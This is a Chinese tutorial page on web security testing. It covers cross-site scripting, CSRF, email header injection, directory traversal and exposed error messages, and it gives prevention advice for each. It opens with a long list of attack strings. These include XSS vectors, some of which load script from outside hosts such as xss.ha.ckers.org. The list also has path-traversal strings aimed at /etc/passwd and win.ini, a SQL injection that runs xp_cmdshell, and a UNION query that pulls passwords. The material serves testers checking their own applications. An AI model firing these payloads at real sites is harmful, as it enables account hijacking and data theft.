WEB的安全性测试要素

发表于:2018-6-15 16:42

字体: | 上一篇 | 下一篇 | 我要投稿

 作者:dodo-yufan    来源:博客园

     注:其它的XSS测试语句
  ><scrīpt>alert(document.cookie)</scrīpt>
  ='><scrīpt>alert(document.cookie)</scrīpt>
  <scrīpt>alert(document.cookie)</scrīpt>
  <scrīpt>alert(vulnerable)</scrīpt>
  %3Cscrīpt%3Ealert('XSS')%3C/scrīpt%3E
  <scrīpt>alert('XSS')</scrīpt>
  <img src="javascrīpt:alert('XSS')">
  %0a%0a<scrīpt>alert(\"Vulnerable\")</scrīpt>.jsp
  %22%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e
  %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
  %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
  %3c/a%3e%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e
  %3c/title%3e%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e
  %3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e/index.html
  %3f.jsp
  %3f.jsp
  &lt;scrīpt&gt;alert('Vulnerable');&lt;/scrīpt&gt
  <scrīpt>alert('Vulnerable')</scrīpt>
  ?sql_debug=1
  a%5c.aspx
  a.jsp/<scrīpt>alert('Vulnerable')</scrīpt>
  a/
  a?<scrīpt>alert('Vulnerable')</scrīpt>
  "><scrīpt>alert('Vulnerable')</scrīpt>
  ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
  %22%3E%3Cscrīpt%3Ealert(document.cookie)%3C/scrīpt%3E
  %3Cscrīpt%3Ealert(document. domain);%3C/scrīpt%3E&
  %3Cscrīpt%3Ealert(document.domain);%3C/scrīpt%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
  1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
  http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd
  ..\..\..\..\..\..\..\..\windows\system.ini
  \..\..\..\..\..\..\..\..\windows\system.ini
  '';!--"<XSS>=&{()}
  <IMG SRC="javascrīpt:alert('XSS');">
  <IMG SRC=javascrīpt:alert('XSS')>
  <IMG SRC=javascrīpt:alert('XSS')>
  <IMG SRC=javascrīpt:alert(&quot;XSS&quot;)>
  <IMG SRC=javascrīpt:alert('XSS')>
  <IMG SRC=javascrīpt:alert('XSS')>
  <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  <IMG SRC="jav ascrīpt:alert('XSS');">
  <IMG SRC="jav ascrīpt:alert('XSS');">
  <IMG SRC="jav ascrīpt:alert('XSS');">
  "<IMG SRC=java\0scrīpt:alert(\"XSS\")>";' > out
  <IMG SRC=" javascrīpt:alert('XSS');">
  <scrīpt>a=/XSS/alert(a.source)</scrīpt>
  <BODY BACKGROUND="javascrīpt:alert('XSS')">
  <BODY ōNLOAD=alert('XSS')>
  <IMG DYNSRC="javascrīpt:alert('XSS')">
  <IMG LOWSRC="javascrīpt:alert('XSS')">
  <BGSOUND SRC="javascrīpt:alert('XSS');">
  <br size="&{alert('XSS')}">
  <LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>
  <LINK REL="stylesheet" HREF="javascrīpt:alert('XSS');">
  <IMG SRC='vbscrīpt:msgbox("XSS")'>
  <IMG SRC="mocha:[code]">
  <IMG SRC="livescrīpt:[code]">
  <META HTTP-EQUIV="refresh" CONTENT="0;url=javascrīpt:alert('XSS');">
  <IFRAME SRC=javascrīpt:alert('XSS')></IFRAME>
  <FRAMESET><FRAME SRC=javascrīpt:alert('XSS')></FRAME></FRAMESET>
  <TABLE BACKGROUND="javascrīpt:alert('XSS')">
  <DIV STYLE="background-image: url(javascrīpt:alert('XSS'))">
  <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
  <DIV STYLE="width: expression(alert('XSS'));">
  <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  <IMG STYLE='xss:expre\ssion(alert("XSS"))'>
  <STYLE TYPE="text/javascrīpt">alert('XSS');</STYLE>
  <STYLE TYPE="text/css">.XSS{background-image:url("javascrīpt:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  <STYLE type="text/css">BODY{background:url("javascrīpt:alert('XSS')")}</STYLE>
  <BASE HREF="javascrīpt:alert('XSS');//">
  getURL("javascrīpt:alert('XSS')")
  a="get";b="URL";c="javascrīpt:";d="alert('XSS');";eval(a+b+c+d);
  <XML SRC="javascrīpt:alert('XSS');">
  "> <BODY ōNLOAD="a();"><scrīpt>function a(){alert('XSS');}</scrīpt><"
  <scrīpt SRC="/Article/UploadFiles/200608/20060827171609376.jpg"></scrīpt>
  <IMG SRC="javascrīpt:alert('XSS')"
  <!--#exec cmd="/bin/echo '<scrīpt SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></scrīpt>'"-->
  <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
  <scrīpt a=">" SRC="http://xss.ha.ckers.org/a.js"></scrīpt>
  <scrīpt =">" SRC="http://xss.ha.ckers.org/a.js"></scrīpt>
  <scrīpt a=">" '' SRC="http://xss.ha.ckers.org/a.js"></scrīpt>
  <scrīpt "a='>'" SRC="http://xss.ha.ckers.org/a.js"></scrīpt>
  <scrīpt>document.write("<SCRI");</scrīpt>PT SRC="http://xss.ha.ckers.org/a.js"></scrīpt>
  <A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>

   最后,当用户浏览时便会弹出一个警告框,内容显示的是浏览者当前的cookie串,这就说明该网站存在XSS漏洞。
  试想如果我们注入的不是以上这个简单的测试代码,而是一段经常精心设计的恶意脚本,当用户浏览此帖时,cookie信息就可能成功的被攻击者获取。此时浏览者的帐号就很容易被攻击者掌控了。
  (2)如何预防XSS漏洞?
  从应用程序的角度来讲,要进行以下几项预防:
  1.对Javascrīpt,VB scrīpt, HTML,ActiveX, Flash等语句或脚本进行转义.
  2.在服务端正式处理之前提交数据的合法性(合法性检查主要包括三项:数据类型,数据长度,敏感字符的校验)进行检查等。最根本的解决手段,在确认客户端的输入合法之前,服务端拒绝进行关键性的处理操作.
  3.从测试人员的角度来讲,要从需求检查和执行测试过程两个阶段来完成XSS检查:
  4.在需求检查过程中对各输入项或输出项进行类型、长度以及取值范围进行验证,着重验证是否对HTML或脚本代码进行了转义。
  执行测试过程中也应对上述项进行检查。
  3.CSRF:(跨站点伪造请求)
  CSRF尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎相左。
  XSS是利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。
  XSS也好,CSRF也好,它的目的在于窃取用户的信息,如SESSION 和 COOKIES(关于SESSION 和COOKIES的介绍请参见我的另一篇BLOG:http://www.51testing.com/?49689/action_viewspace_itemid_74885.html),
  4.Email Header Injection(邮件标头注入)
  Email Header Injection:如果表单用于发送email,表单中可能包括“subject”输入项(邮件标题),我们要验证subject中应能escape掉“\n”标识。
  <!--[if !supportLists]--> <!--[endif]-->因为“\n”是新行,如果在subject中输入“hello\ncc:spamvictim@example.com”,可能会形成以下
  Subject: hello
  cc: spamvictim@example.com
  <!--[if !supportLists]--> <!--[endif]-->如果允许用户使用这样的subject,那他可能会给利用这个缺陷通过我们的平台给其它用户发送垃圾邮件。
  5.Directory Traversal(目录遍历)
  (1)如何进行目录遍历测试?
  目录遍历产生的原因是:程序中没有过滤用户输入的“../”和“./”之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。
  测试方法:在URL中输入一定数量的“../”和“./”,验证系统是否ESCAPE掉了这些目录跳转符。
  (2)如何预防目录遍历?
  限制Web应用在服务器上的运行
  进行严格的输入验证,控制用户输入非法路径
  6.exposed error messages(错误信息)
  (1)如何进行测试?
  首先找到一些错误页面,比如404,或500页面。
  验证在调试未开通过的情况下,是否给出了友好的错误提示信息比如“你访问的页面不存在”等,而并非曝露一些程序代码。
  (2)如何预防?
  测试人员在进行需求检查时,应该对出错信息进行详细查,比如是否给出了出错信息,是否给出了正确的出错信息。
上文内容不用于商业目的,如涉及知识产权问题,请权利人联系博为峰小编(021-64471599-8017),我们将立即处理。
22/2<12
《2023软件测试行业现状调查报告》独家发布~

关注51Testing

联系我们

快捷面板 站点地图 联系我们 广告服务 关于我们 站长统计 发展历程

法律顾问:上海兰迪律师事务所 项棋律师
版权所有 上海博为峰软件技术股份有限公司 Copyright©51testing.com 2003-2024
投诉及意见反馈:webmaster@51testing.com; 业务联系:service@51testing.com 021-64471599-8017

沪ICP备05003035号

沪公网安备 31010102002173号